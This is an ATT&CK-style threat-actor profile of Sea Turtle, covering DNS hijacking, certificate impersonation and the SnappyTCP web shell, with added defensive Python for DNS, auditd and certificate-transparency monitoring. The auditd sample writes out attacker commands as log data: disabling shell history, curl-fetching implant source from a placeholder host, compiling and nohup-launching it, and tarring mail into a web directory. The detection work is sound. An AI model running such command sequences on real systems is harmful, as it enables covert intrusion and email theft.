
Sea Turtle

Sea Turtle is a Türkiye-linked threat actor active since at least 2017 that performs espionage and service provider compromise operations against victims in Asia, Europe, and North America. Sea Turtle is notable for targeting registrars that manage ccTLDs and for complex DNS-based intrusions in which it compromised DNS providers to hijack DNS resolution for the ultimate victims, enabling it to spoof login portals and other applications for credential collection.(Citation: Talos Sea Turtle 2019)(Citation: Talos Sea Turtle 2019_2)(Citation: PWC Sea Turtle 2023)(Citation: Hunt Sea Turtle 2024)
ID: G1041
Associated Groups: SILICON, Teal Kurma, Marbled Dust, Cosmic Wolf
Created: 20 Nov 2024
Last Modified: 28 Mar 2025

Associated Group Descriptions

Name Description
SILICON (Citation: Microsoft Digital Defense 2021)(Citation: Hunt Sea Turtle 2024)
Teal Kurma (Citation: PWC Sea Turtle 2023)(Citation: Hunt Sea Turtle 2024)
Marbled Dust (Citation: PWC Sea Turtle 2023)(Citation: Hunt Sea Turtle 2024)
Cosmic Wolf (Citation: PWC Sea Turtle 2023)(Citation: Hunt Sea Turtle 2024)

Techniques Used

Domain ID Name Use
Enterprise T1583 .001 Acquire Infrastructure: Domains

Sea Turtle registered domains for authoritative name servers used in DNS hijacking activity and for command and control servers.(Citation: Talos Sea Turtle 2019_2)(Citation: Hunt Sea Turtle 2024)

Enterprise T1583 .002 Acquire Infrastructure: DNS Server

Sea Turtle built adversary-in-the-middle DNS servers that impersonated legitimate services and were later used to capture credentials.(Citation: Talos Sea Turtle 2019_2)(Citation: Talos Sea Turtle 2019)

Enterprise T1583 .003 Acquire Infrastructure: Virtual Private Server

Sea Turtle created adversary-in-the-middle servers to impersonate legitimate services and enable credential capture.(Citation: Talos Sea Turtle 2019)

Enterprise T1071 .001 Application Layer Protocol: Web Protocols

Sea Turtle connected over TCP using HTTP to establish command and control channels.(Citation: Hunt Sea Turtle 2024)

Enterprise T1560 .001 Archive Collected Data: Archive via Utility

Sea Turtle used the tar utility to create a local archive of email data on a victim system.(Citation: Hunt Sea Turtle 2024)

Enterprise T1059 .004 Command and Scripting Interpreter: Unix Shell

Sea Turtle used shell scripts for post-exploitation execution in victim environments.(Citation: PWC Sea Turtle 2023)(Citation: Hunt Sea Turtle 2024)

Enterprise T1584 .002 Compromise Infrastructure: DNS Server

Sea Turtle modified Name Server (NS) records to point at Sea Turtle-controlled DNS servers, which then answered all DNS lookups for the affected domains.(Citation: Talos Sea Turtle 2019)(Citation: Talos Sea Turtle 2019_2)
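A registrar-level NS change of the kind described above is visible from the outside: the delegation returned for the domain no longer matches the name servers the organisation operates, and, while only part of the NS set has been swapped, different recursive resolvers start returning different answers for the same host. The following is an added example of such a monitor, not code from the ATT&CK page or from any of the cited reports. It parses `dig`-style answer sections and compares them with a recorded baseline; the domain `example.test`, the name servers, the resolver list and the IP addresses are constructed for the example.

```python
from __future__ import annotations

import re
from dataclasses import dataclass

# Constructed baseline: the name servers the organisation itself operates
# (hypothetical domain and hosts, not taken from the page).
BASELINE_NS = {"example.test": {"ns1.example.test", "ns2.example.test"}}

# Constructed `dig NS example.test` answer sections. The second shows a
# registrar-side delegation change: one legitimate NS replaced by a host the
# organisation does not control.
DIG_OK = """\
;; ANSWER SECTION:
example.test.        3600    IN    NS    ns1.example.test.
example.test.        3600    IN    NS    NS2.Example.Test.

;; Query time: 12 msec
"""
DIG_HIJACKED = """\
;; ANSWER SECTION:
example.test.        300    IN    NS    ns1.example.test.
example.test.        300    IN    NS    ns-a.rogue-dns.invalid.

;; Query time: 40 msec
"""

# Constructed A answers for one monitored host as seen from several resolvers;
# a resolver that happened to ask the rogue NS gets a different address.
EXPECTED_IPS = {"mail.example.test": {"198.51.100.20"}}
RESOLVER_ANSWERS = {
    "resolver-1.corp.example.test": {"198.51.100.20"},
    "9.9.9.9": {"198.51.100.20"},
    "1.1.1.1": {"203.0.113.45"},
}

RR_RE = re.compile(
    r"^(?P<owner>\S+)\s+(?P<ttl>\d+)\s+IN\s+(?P<rtype>[A-Z]+)\s+(?P<rdata>\S+)$"
)


def norm(name: str) -> str:
    """DNS names are case-insensitive; drop the trailing dot as well."""
    return name.lower().rstrip(".")


def parse_answer_section(dig_output: str) -> list[tuple[str, int, str, str]]:
    """Return (owner, ttl, type, rdata) for each RR inside dig's ANSWER SECTION."""
    records = []
    in_answer = False
    for raw in dig_output.splitlines():
        line = raw.strip()
        if line.startswith(";; ANSWER SECTION"):
            in_answer = True
            continue
        if line.startswith(";;"):
            in_answer = False  # any other ;; header ends the answer section
            continue
        m = RR_RE.match(line) if in_answer and line else None
        if m:
            records.append((norm(m["owner"]), int(m["ttl"]), m["rtype"], norm(m["rdata"])))
    return records


@dataclass
class Finding:
    severity: str
    detail: str


def check_delegation(domain: str, dig_output: str, baseline=BASELINE_NS) -> list[Finding]:
    """Diff the observed NS set against the baseline. Any name server the
    organisation does not operate means the delegation itself was changed."""
    expected = baseline[domain]
    observed = {
        rdata for owner, _ttl, rtype, rdata in parse_answer_section(dig_output)
        if owner == domain and rtype == "NS"
    }
    findings = [Finding("high", f"unexpected name server in delegation: {ns}")
                for ns in sorted(observed - expected)]
    findings += [Finding("medium", f"expected name server missing: {ns}")
                 for ns in sorted(expected - observed)]
    return findings


def check_resolution(host: str, answers: dict[str, set[str]], expected=EXPECTED_IPS) -> list[Finding]:
    """Flag resolvers whose answer for a monitored host is off the baseline.
    With only part of the NS set hijacked, only some resolvers are affected."""
    return [
        Finding("high", f"{resolver} resolves {host} to {', '.join(sorted(ips - expected[host]))}")
        for resolver, ips in sorted(answers.items())
        if ips - expected[host]
    ]


if __name__ == "__main__":
    for f in check_delegation("example.test", DIG_HIJACKED) + check_resolution("mail.example.test", RESOLVER_ANSWERS):
        print(f.severity.upper(), f.detail)
```

Run the delegation check against the parent zone's servers (or the registrar's WHOIS/RDAP data) rather than against your own authoritative servers, which will happily report the old, correct NS set; the resolution check is only meaningful when the resolvers queried are outside the network whose DNS is suspected of being hijacked.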

Enterprise T1074 .002 Data Staged: Remote Data Staging

Sea Turtle staged collected email archives in the public web directory of a website that was accessible from the internet.(Citation: Hunt Sea Turtle 2024)

Enterprise T1114 .001 Email Collection: Local Email Collection

Sea Turtle collected email archives from victim environments.(Citation: Hunt Sea Turtle 2024)

Enterprise T1564 .011 Hide Artifacts: Ignore Process Interrupts

Sea Turtle executed SnappyTCP via the nohup utility, which keeps the process running after the shell or terminal that launched it exits.(Citation: Hunt Sea Turtle 2024)

Enterprise T1562 .003 Impair Defenses: Impair Command History Logging

Sea Turtle unset the Bash and MySQL history file variables on victim systems so that interactive commands were not written to disk.(Citation: Hunt Sea Turtle 2024)

Enterprise T1070 .002 Indicator Removal: Clear Linux or Mac System Logs

Sea Turtle has overwritten Linux system logs and unset the Bash history file (effectively removing logging) during intrusions.(Citation: Hunt Sea Turtle 2024)

Enterprise T1027 .004 Obfuscated Files or Information: Compile After Delivery

Sea Turtle downloaded source code files from remote addresses then compiled them locally via GCC in victim environments.(Citation: Hunt Sea Turtle 2024)
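The Linux post-exploitation behaviour listed above (archiving mail data with tar and staging it in a web directory, launching the implant with nohup, unsetting the history variables, and fetching source to compile with GCC) all passes through execve, so it can be hunted in auditd EXECVE records. The following is an added example of that detection logic, not code from the page or from the cited reports: it parses EXECVE lines (auditd hex-encodes an argument containing spaces, which is how a `sh -c "..."` string shows up), reconstructs argv, and maps each command to the sub-techniques in this table. The log lines, file paths, account name and the address 203.0.113.10 are constructed for the example.

```python
from __future__ import annotations

import os
import re

# Constructed auditd EXECVE records, as produced with execve auditing enabled.
# Paths, the account name and the 203.0.113.10 download host are hypothetical.
SAMPLE_AUDIT_LOG = """\
type=EXECVE msg=audit(1700000000.101:2001): argc=2 a0="ls" a1="-la"
type=EXECVE msg=audit(1700000000.102:2002): argc=3 a0="sh" a1="-c" a2=756E736574204849535446494C45
type=EXECVE msg=audit(1700000000.103:2003): argc=3 a0="sh" a1="-c" a2=756E736574204D5953514C5F4849535446494C45
type=EXECVE msg=audit(1700000000.104:2004): argc=5 a0="curl" a1="-s" a2="-o" a3="/tmp/.x/snappy.c" a4="http://203.0.113.10/snappy.c"
type=EXECVE msg=audit(1700000000.105:2005): argc=4 a0="gcc" a1="-o" a2="/tmp/.x/snappy" a3="/tmp/.x/snappy.c"
type=EXECVE msg=audit(1700000000.106:2006): argc=2 a0="nohup" a1="/tmp/.x/snappy"
type=EXECVE msg=audit(1700000000.107:2007): argc=4 a0="tar" a1="-czf" a2="/home/acct/public_html/backup.tgz" a3="/home/acct/Maildir"
"""

EXECVE_RE = re.compile(
    r"type=EXECVE msg=audit\((?P<ts>[\d.]+):(?P<id>\d+)\): argc=(?P<argc>\d+) (?P<args>.*)$"
)
# Quoted value, or bare hex when the argument held spaces/quotes.
ARG_RE = re.compile(r'a(\d+)=(?:"([^"]*)"|([0-9A-Fa-f]+))')

HISTORY_RE = re.compile(
    r"\b(?:unset\s+(?:HISTFILE|MYSQL_HISTFILE)|(?:HISTFILE|MYSQL_HISTFILE)=/dev/null|HISTSIZE=0)"
)
COMPILERS = {"gcc", "cc", "g++", "clang", "tcc"}
TEMP_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")
MAIL_MARKERS = ("maildir", "/var/mail", "/var/spool/mail", "/mail/")
WEB_ROOTS = ("public_html", "/var/www", "/htdocs")


def parse_execve(line: str) -> tuple[str, list[str]] | None:
    """Return (event id, argv) for an EXECVE record, decoding hex-encoded args."""
    m = EXECVE_RE.match(line)
    if not m:
        return None
    argv: dict[int, str] = {}
    for idx, quoted, hexed in ARG_RE.findall(m["args"]):
        argv[int(idx)] = bytes.fromhex(hexed).decode("utf-8", "replace") if hexed else quoted
    return m["id"], [argv[i] for i in sorted(argv)]


def classify(argv: list[str], downloaded: set[str]) -> list[tuple[str, str]]:
    """Map one argv to the sub-techniques listed for this actor. `downloaded`
    carries curl/wget output paths forward so a later compile can be tied to them."""
    hits = []
    prog = os.path.basename(argv[0])
    joined = " ".join(argv)
    if HISTORY_RE.search(joined):  # shell builtins only appear inside a -c string
        hits.append(("T1562.003", "shell or MySQL client history disabled"))
    if prog in ("curl", "wget"):
        for flag in ("-o", "-O"):
            if flag in argv[:-1]:
                downloaded.add(argv[argv.index(flag) + 1])
    if prog in COMPILERS:
        for src in (a for a in argv if a.endswith((".c", ".cc", ".cpp"))):
            if src in downloaded or src.startswith(TEMP_DIRS):
                hits.append(("T1027.004", f"compiling {src}, downloaded earlier or in a temp dir"))
    if prog == "nohup" and len(argv) > 1:
        hits.append(("T1564.011", f"{argv[1]} started with nohup"))
    if prog == "tar":
        if any(mk in a.lower() for a in argv for mk in MAIL_MARKERS):
            hits.append(("T1560.001", "mail data archived with tar (also T1114.001)"))
            if any(wr in a for a in argv for wr in WEB_ROOTS):
                hits.append(("T1074.002", "archive written under a web-served directory"))
    return hits


def scan_log(log: str) -> list[tuple[str, list[str], list[tuple[str, str]]]]:
    """Return (event id, argv, hits) for every EXECVE record that matched a rule."""
    downloaded: set[str] = set()
    events = []
    for line in log.splitlines():
        parsed = parse_execve(line)
        if parsed is None:
            continue
        event_id, argv = parsed
        hits = classify(argv, downloaded)
        if hits:
            events.append((event_id, argv, hits))
    return events


if __name__ == "__main__":
    for event_id, argv, hits in scan_log(SAMPLE_AUDIT_LOG):
        print(event_id, " ".join(argv), "->", ", ".join(t for t, _ in hits))
```

Because `unset HISTFILE` is a shell builtin, it never produces an EXECVE record of its own; it is only observable here because the web shell hands the whole command string to `sh -c`. Interactive sessions need a different control (for example, a read-only HISTFILE pushed via PROMPT_COMMAND, or process accounting), and the absence of a history file for an account that was clearly active is itself a finding.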

Enterprise T1588 .002 Obtain Capabilities: Tool

Sea Turtle has used tools such as Adminer during intrusions.(Citation: Hunt Sea Turtle 2024)

Enterprise T1588 .004 Obtain Capabilities: Digital Certificates

Sea Turtle performed "certificate impersonation," a technique in which the actors obtained a certificate authority-signed X.509 certificate for the targeted domain from a different provider, imitating the certificate already used by the targeted organization.(Citation: Talos Sea Turtle 2019)(Citation: Talos Sea Turtle 2019_2)

Enterprise T1505 .003 Server Software Component: Web Shell

Sea Turtle deployed the SnappyTCP web shell during intrusion operations.(Citation: PWC Sea Turtle 2023)(Citation: Hunt Sea Turtle 2024)

Enterprise T1608 .003 Stage Capabilities: Install Digital Certificate

Sea Turtle captured legitimate SSL certificates from victim organizations and installed these on Sea Turtle-controlled infrastructure to enable subsequent adversary-in-the-middle operations.(Citation: Talos Sea Turtle 2019)
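Both certificate techniques above leave a measurable trace: an impersonation certificate (T1588.004) is a new certificate for the organisation's name from a CA the organisation never authorised, and it is logged in Certificate Transparency; a stolen certificate re-hosted on adversary infrastructure (T1608.003) is the organisation's own certificate fingerprint served from an address outside its infrastructure. The following is an added example that checks both, not code from the page or from Talos/PWC/Hunt: it scores external probe results against a baseline and audits CT-log entries in the field layout used by crt.sh's JSON output. The host, addresses, issuer names and fingerprints are constructed for the example.

```python
from __future__ import annotations

from dataclasses import dataclass

# Constructed baseline for one monitored host: the addresses the organisation
# serves it from, the SHA-256 of the certificate it deployed, and the CAs it
# has authorised. All values are hypothetical.
APPROVED_ISSUERS = {"C=US, O=Example Trust CA, CN=Example Trust CA R1"}
BASELINE = {
    "mail.example.test": {
        "ips": {"198.51.100.20"},
        "cert_sha256": "11" * 32,  # placeholder fingerprint of the deployed cert
    }
}

# Constructed probe results: what an external monitor recorded after resolving
# the host and completing a TLS handshake with whatever answered.
OBSERVATIONS = [
    {"host": "mail.example.test", "ip": "198.51.100.20", "cert_sha256": "11" * 32,
     "issuer": "C=US, O=Example Trust CA, CN=Example Trust CA R1"},
    # the organisation's own certificate served from a host it does not own
    {"host": "mail.example.test", "ip": "203.0.113.45", "cert_sha256": "11" * 32,
     "issuer": "C=US, O=Example Trust CA, CN=Example Trust CA R1"},
    # a freshly issued look-alike certificate from a CA the organisation never used
    {"host": "mail.example.test", "ip": "203.0.113.45", "cert_sha256": "22" * 32,
     "issuer": "C=US, O=Other Public CA, CN=Other Public CA R2"},
    # routine rotation by the approved CA on baseline infrastructure
    {"host": "mail.example.test", "ip": "198.51.100.20", "cert_sha256": "33" * 32,
     "issuer": "C=US, O=Example Trust CA, CN=Example Trust CA R1"},
]

# Constructed CT-log entries in the shape of crt.sh's JSON (name_value holds
# newline-separated SANs).
CT_ENTRIES = [
    {"id": 1, "issuer_name": "C=US, O=Example Trust CA, CN=Example Trust CA R1",
     "name_value": "mail.example.test\nwww.example.test", "not_before": "2024-01-10T00:00:00"},
    {"id": 2, "issuer_name": "C=US, O=Other Public CA, CN=Other Public CA R2",
     "name_value": "mail.example.test", "not_before": "2024-03-02T11:52:00"},
    {"id": 3, "issuer_name": "C=US, O=Other Public CA, CN=Other Public CA R2",
     "name_value": "unrelated.test", "not_before": "2024-03-02T12:00:00"},
]


@dataclass
class Finding:
    host: str
    severity: str
    detail: str


def assess_observation(obs: dict, baseline=BASELINE, approved=APPROVED_ISSUERS) -> list[Finding]:
    """Combine where the host resolved, which certificate was served and who
    issued it; the combination, not any single field, tells the cases apart."""
    host, base = obs["host"], baseline[obs["host"]]
    off_infra = obs["ip"] not in base["ips"]
    same_cert = obs["cert_sha256"] == base["cert_sha256"]
    approved_issuer = obs["issuer"] in approved
    if off_infra and same_cert:
        return [Finding(host, "high", f"our deployed certificate is served from {obs['ip']}, "
                        "which is not ours: stolen key/cert on an adversary-in-the-middle host")]
    if not same_cert and not approved_issuer:
        return [Finding(host, "high", f"new certificate from unapproved CA ({obs['issuer']}) "
                        f"served from {obs['ip']}: possible certificate impersonation")]
    if off_infra:
        return [Finding(host, "high", f"resolution points to {obs['ip']}, outside baseline infrastructure")]
    if not same_cert:
        return [Finding(host, "info", "certificate rotated by an approved CA; confirm against change records")]
    return []


def covers(name_value: str, host: str) -> bool:
    """True if an entry's SAN list covers the host, exactly or by a one-label wildcard."""
    names = {n.strip().lower() for n in name_value.split("\n")}
    parent = host.split(".", 1)[1]
    return host in names or f"*.{parent}" in names


def audit_ct_log(entries: list[dict], host: str, approved=APPROVED_ISSUERS) -> list[Finding]:
    """Certificates for our name from CAs we never authorised."""
    return [
        Finding(host, "high", f"CT entry {e['id']} issued {e['not_before']} by unapproved CA: {e['issuer_name']}")
        for e in entries
        if covers(e["name_value"], host) and e["issuer_name"] not in approved
    ]


if __name__ == "__main__":
    for obs in OBSERVATIONS:
        for f in assess_observation(obs):
            print(f.severity.upper(), f.host, f.detail)
    for f in audit_ct_log(CT_ENTRIES, "mail.example.test"):
        print(f.severity.upper(), f.host, f.detail)
```

A CAA record is not a substitute for the CT check here: once the delegation is in the adversary's hands, the adversary's name servers answer the CA's CAA lookup and its DNS- or HTTP-based domain validation, so a publicly trusted CA will issue a perfectly valid certificate to them. Monitoring CT for issuers you did not authorise is what surfaces that, independently of DNS.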

Enterprise T1078 .003 Valid Accounts: Local Accounts

Sea Turtle compromised cPanel accounts in victim environments.(Citation: Hunt Sea Turtle 2024)

Software

ID Name References Techniques
S1163 SnappyTCP (Citation: PWC Sea Turtle 2023) Unix Shell, Web Protocols, Asymmetric Cryptography, Web Shell, Non-Application Layer Protocol
